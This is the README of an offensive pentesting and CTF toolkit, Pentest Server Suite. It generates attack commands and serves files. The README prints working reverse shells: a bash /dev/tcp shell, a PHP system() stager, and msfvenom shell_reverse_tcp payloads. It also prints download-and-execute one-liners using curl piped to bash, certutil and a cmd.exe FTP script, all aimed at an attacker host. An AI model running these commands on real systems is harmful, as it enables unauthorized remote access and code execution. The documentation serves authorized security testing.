Skip to content

Latest commit

 

History

History
143 lines (101 loc) · 5.18 KB

README.md

File metadata and controls

143 lines (101 loc) · 5.18 KB

🛠️ Pentest Server Suite (PSS) 🛡️

Pentest Server Suite (PSS) is a versatile toolkit designed to aid in pentesting and CTF challenges by providing a streamlined command-line interface for various tasks. It simplifies serving and receiving files over HTTP, FTP, and SMB protocols, generates reverse shells and facilitates the creation of commands for tasks like downloading/uploading/executing files and setting up listeners.

🚀 Features

  • Serve/Receive files over:
    • HTTP 🌐 (with template support)
    • SMB 🔒
    • FTP 📂
  • Generate reverse shells:
    • Create copy & paste commands for tools like netcat, socat and the most commonly used shells 🐚
  • Generate commands for:
    • Downloading/executing files using tools like curl 📥
    • Setting up listeners with netcat, socat, etc. 🎧
    • Creating msfvenom/nim shell payloads 🚀

⚙️ Installation

Clone the repository and install dependencies:

apt install python3.12 python3.12-full python3.12-dev python3.12-venv -y
cd ~ && git clone https://github.com/Jnnshschl/PentestServerSuite.git pss
chmod +x ~/pss/pss.sh
ln -s ~/pss/pss.sh /usr/bin/pss

Start the server:

pss -S ./Tools/

🚀 Usage Examples

Generate common commands

While doing CTF's you'll come across the point of needing a reverse shell command or download/upload a file to the system or execute a script in memory using powershell. PSS makes it very easy to generate such command in a copy&paste approach:

# This assumes you have the "winPEASx64.exe" in your serve folder under windows/winpeas/
# Hint: to install winpeas using githubtools type ths following command:
#       pss> githubtools add windows winpeas https://github.com/carlospolop/PEASS-ng .+\.exe
pss> launcher generate ftp/cmd-ftp-download windows/winpeas/winPEASx64.exe

# PSS is going to generate a copy&paste ready command to download the "winPEASx64.exe" using cmd.exe and ftp from the pss FTP server:
cmd.exe /c "@echo open 192.168.1.51 21>kpaowusl.txt&@echo binary>>kpaowusl.txt&@echo GET windows/winpeas/winPEASx64.exe >>kpaowusl.txt&@echo quit>>kpaowusl.txt&@ftp -A -s:kpaowusl.txt -v -i&del kpaowusl.txt"

# The same can be done for running linpeash using curl piped into /bin/bash:
# Hint: to install linpeas using githubtools type ths following command:
#       pss> githubtools add linux linpeas https://github.com/carlospolop/PEASS-ng .+\.sh
pss> launcher generate http/curl-shell linux/linpeas/linpeas.sh

curl -sSL 'http://192.168.1.51/linux/linpeas/linpeas.sh' | /bin/bash

# To change shell binary or network interface type:
pss> set SHELLBIN /bin/sh
pss> set SHELLBIN /bin/zsh

pss> set LHOST 10.0.0.6
# or by NIC name
pss> set LHOST tun0

Generate a simple bash reverse shell:

pss> shell build bash/i_c
# /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.51/4711 0>&1'

Generate php code to launch a revese shell (shell will also be served over HTTP at http://192.168.1.5/php/system):

pss> shell set bash/i_c
pss> stager build php/system
# <?php system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.51/4711 0>&1'"); ?>

Git-/Githubtools Plugins

PSS comes with the ability to manage you common used tools from git repositories and github releases (more ways to come) using the gittools and githubtools Plugins like this:

Tools can be updates using these commands:

pss> githubtools update
pss> gtools update

Example to get every .zip file from the https://github.com/antonioCoco/RunasCs repository realeses (unzipping will be done automatically):

# githubtools add <OPERATING_SYSTEM> <TOOL_NAME> <GITHUB_URL> <FILENAME_REGEX>
pss> githubtools add windows runascs https://github.com/antonioCoco/RunasCs/releases/tag/v1.5 .+\.zip

Example to clone the https://github.com/3ndG4me/AutoBlue-MS17-010 repository into you tools folder:

# gittools add <OPERATING_SYSTEM> <TOOL_NAME> <GIT_REPO_URL>
pss> gittools add windows https://github.com/3ndG4me/AutoBlue-MS17-010.git

Msfvenom Generator

PSS can utilize the msfvenom command to generate temporary executables with the configured LHOST and LPORT for you to use like this:

Example to clone the https://github.com/3ndG4me/AutoBlue-MS17-010 repository into you tools folder:

# msfv <TYPE> <OUTPUT_FORMAT>
pss> msfv windows/x64/shell_reverse_tcp exe

# command that is going to be used:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.51 LPORT=4711 -f exe -o /usr/share/tools/tmp/48593963.exe

After doing this, you could upload and run the exe using a launcher:

pss> launcher generate http/certutil-run tmp/48593963.exe
certutil.exe -urlcache -split -f "http://192.168.1.51/tmp/48593963.exe" ".\48593963.exe" && .\48593963.exe

BaseX/URL encoding

Supported encodings: base16, base32, base64, base85, URLencoding

pss> base32 encode testSample
ORSXG5CTMFWXA3DF

pss> base32 decode ORSXG5CTMFWXA3DF
testSample

pss> url encodeall http://192.168.1.51/tmp/48593963.exe
%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%35%31%2f%74%6d%70%2f%34%38%35%39%33%39%36%33%2e%65%78%65

pss> url decode %68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%35%31%2f%74%6d%70%2f%34%38%35%39%33%39%36%33%2e%65%78%65
http://192.168.1.51/tmp/48593963.exe